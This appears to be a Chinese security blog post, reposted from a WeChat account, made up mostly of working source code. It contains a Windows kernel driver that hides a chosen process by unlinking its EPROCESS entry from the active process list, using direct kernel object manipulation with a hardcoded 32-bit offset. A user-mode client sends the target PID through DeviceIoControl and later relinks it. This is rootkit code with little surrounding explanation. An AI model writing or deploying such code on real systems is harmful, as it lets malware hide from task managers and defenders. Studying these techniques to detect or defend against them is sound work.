- 驱动代码
#include <ntifs.h>#include <wdm.h>#include <ntddk.h>#include <ntstatus.h>
UNICODE_STRING Devicename;
UNICODE_STRING SymbolLink;
#define DEVICE_NAME L"\Device\HideProcess"
#define SYMBOLICLINE_NAME L"\??\HideProcess" //ring3用CreateFile打开设备时,用"\\.\MyTestDriver"//相当于起的别名
#define HIDE CTL_CODE(FILE_DEVICE_UNKNOWN,0x800/*0-0x7FF??*/,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define SHOW CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_BUFFERED,FILE_ANY_ACCESS)
//实现卸载函数和派遣函数
VOID DriverUnload(PDRIVER_OBJECT pDeviceObject)
{
IoDeleteSymbolicLink(&SymbolLink);
IoDeleteDevice(pDeviceObject->DeviceObject); //假设 DriverEntry 函数中的 dobj 变量声明为全局的,为什么不使用这个删除设备对象
DbgPrint("EXIT!");
}
NTSTATUS IrpCreateProc(PDEVICE_OBJECT pDeviceObject/*设备信息*/, PIRP pIrp/*参数信息*/)
{
DbgPrint("DispatchCreate ... n");
pIrp->IoStatus.Status = STATUS_SUCCESS;//getlasterror()得到的就是这个值
pIrp->IoStatus.Information = 0;//返回给3环多少数据,没有填0
IoCompleteRequest(pIrp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
NTSTATUS IrpCloseProc(PDEVICE_OBJECT pdriver, PIRP pIrp)
{
DbgPrint("DispatchClose ... n");
pIrp->IoStatus.Status = STATUS_SUCCESS;
pIrp->IoStatus.Information = 0;
IoCompleteRequest(pIrp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
// 参数pIrp:I / O 管理器在接受到应用层的设备读写请求后, 将请求封装为一个IRP请求(包含IRP 头部和IO_STACK_LOCATION)
NTSTATUS IrpDeviceContrlProc(PDEVICE_OBJECT pdriver, PIRP pIrp)
{
NTSTATUS status = STATUS_INVALID_DEVICE_REQUEST;
PIO_STACK_LOCATION pIrpStack;
ULONG uIoControlCode;
PVOID pIoBuffer;
ULONG uInLength;
ULONG uOutLength;
ULONG uHideRead; //读取隐藏
ULONG uWrite;
ULONG uShowRead[2]; //读取显示
//设置临时变量的值
uHideRead = 0;
//uWrite = 0x12345678;
// 设置临时变量的值
pIrpStack = IoGetCurrentIrpStackLocation(pIrp);
// 获取控制码
uIoControlCode = pIrpStack->Parameters.DeviceIoControl.IoControlCode;
// 获取缓冲区地址(输入和输出的缓冲区都是一个)
pIoBuffer = pIrp->AssociatedIrp.SystemBuffer;
// Ring3 发送数据的长度
uInLength = pIrpStack->Parameters.DeviceIoControl.InputBufferLength;
// Ring0 发送数据的长度
uOutLength = pIrpStack->Parameters.DeviceIoControl.OutputBufferLength;
LIST_ENTRY* thisProcess; //自身
LIST_ENTRY* fProcess; //前一个
LIST_ENTRY* bProcess; //后一个
PEPROCESS pProcess;
switch (uIoControlCode)
{
case HIDE:
{
DbgPrint("HIDE");
RtlMoveMemory(&uHideRead, pIoBuffer, 4);
if (PsLookupProcessByProcessId((HANDLE)uHideRead, &pProcess) == STATUS_SUCCESS)
{
DbgPrint("得到消息,目前 EPROCESS 地址为:0x%p", pProcess);
RtlMoveMemory(pIoBuffer, &pProcess, 4);//将找到的pProcess发送给3环,后面恢复用
pIrp->IoStatus.Information = 4;
DbgPrint("pIoBuffer:%xn", pIoBuffer);
thisProcess = (LIST_ENTRY*)((ULONG)pProcess + 0x88); //自身链表
bProcess = thisProcess->Blink; //前一个等于自身链表的前一个
fProcess = thisProcess->Flink; //后一个等于自身链表的后一个
bProcess->Flink = fProcess; //前一个的后一个,指向当前的后一个
fProcess->Blink = bProcess; //后一个的前一个,指向当前的前一个
DbgPrint("断链成功!!!");
break;
}
break;
}
case SHOW:
{
RtlMoveMemory(&uShowRead, pIoBuffer, 8);
DbgPrint("HIDE");
if (PsLookupProcessByProcessId((HANDLE)uShowRead[0], &pProcess) == STATUS_SUCCESS)
{
DbgPrint("得到消息,目前 EPROCESS 地址为:0x%p", pProcess);
thisProcess = (LIST_ENTRY*)((ULONG)pProcess + 0x88); //当前的
bProcess = (LIST_ENTRY*)((ULONG)uShowRead[1] + 0x88); //需要恢复的
fProcess = thisProcess->Flink; //当前的后一个链表
thisProcess->Flink = bProcess; //当前的后一个链表,执行需要恢复的
bProcess->Blink = thisProcess; //需要恢复的前一个,指向当前的链表
bProcess->Flink = fProcess; //需要恢复的后一个,指向当前进程的后一个
fProcess->Blink = bProcess; //当前的后一个,指向当前需要恢复的。
DbgPrint("恢复成功!!!");
pIrp->IoStatus.Information = 0;
}
break;
}
}
//设置返回状态,否则默认是失败
pIrp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(pIrp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pdriver, PUNICODE_STRING reg_path)
{
DbgPrint("Welcome Driver,rn");
NTSTATUS status = 0;
ULONG uIndex = 0;
UNICODE_STRING DeviceName;
UNICODE_STRING SymbolicLinkName;
//PDEVICE_OBJECT pDeviceObject = NULL;
NTSTATUS nStatus;
PDEVICE_OBJECT pDevice;
// 创建设备
RtlInitUnicodeString(&DeviceName, DEVICE_NAME);
//创建设备
status = IoCreateDevice(pdriver, 0, &DeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDevice);
if (status != STATUS_SUCCESS)
{
DbgPrint("创建设备失败! rn");
return status;
}
//设置交互数据方式
pDevice->Flags |= DO_BUFFERED_IO;
//创建符号链接名称,就是给该设备在三环起个能用的别名
RtlInitUnicodeString(&SymbolicLinkName, SYMBOLICLINE_NAME);
//创建符号链接
status = IoCreateSymbolicLink(&SymbolicLinkName, &DeviceName);
if (status != STATUS_SUCCESS)
{
DbgPrint("创建符号链接失败!rn");
IoDeleteDevice(pDevice);
return status;
}
//设置派遣函数和卸载函数
pdriver->MajorFunction[IRP_MJ_CREATE] = IrpCreateProc;
pdriver->MajorFunction[IRP_MJ_CLOSE] = IrpCloseProc;
pdriver->MajorFunction[IRP_MJ_DEVICE_CONTROL] = IrpDeviceContrlProc;
pdriver->DriverUnload = DriverUnload;
return STATUS_SUCCESS;
}
- 3环代码
// 进程隐藏.cpp : Defines the entry point for the console application.//
#include "stdafx.h"
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#define SYMBOLICLINE_NAME L"\\.\HideProcess" //ring3?CreateFile?????,?"\\.\MyTestDriver"//???????
#define HIDE CTL_CODE(FILE_DEVICE_UNKNOWN,0x800/*0-0x7FF??*/,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define SHOW CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_BUFFERED,FILE_ANY_ACCESS)
HANDLE g_Device;
int main(int argc, char* argv[])
{
g_Device=CreateFileW(SYMBOLICLINE_NAME,GENERIC_READ|GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if (g_Device==INVALID_HANDLE_VALUE)
{
printf("g_Device Errorn");
CloseHandle(g_Device);
return 0;
}
DWORD pid;
DWORD outBuffer;
DWORD dwRead[2];
DWORD re;
printf("请输入需要隐藏进程的 pid :n");
scanf("%d",&pid);
if (pid)
{
if (DeviceIoControl(g_Device,HIDE,&pid,sizeof(DWORD), &outBuffer,sizeof(DWORD),&re,NULL))
{
printf("SUCCESSE! PLEASE SEE");
}
printf("检查任务管理器!n");
dwRead[0]=GetCurrentProcessId();
dwRead[1]=outBuffer;
printf("outBuffer = %xn",outBuffer);
system("pause");
if (DeviceIoControl(g_Device,SHOW,dwRead,sizeof(DWORD)*2, &outBuffer,sizeof(DWORD),&re,NULL))
{
printf("恢复成功!n");
}
}
else
{
printf("pid ERROR!n");
}
CloseHandle(g_Device);
system("pause");
return 0;
}
原文始发于微信公众号(loochSec):进程与线程-内核隐藏进程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论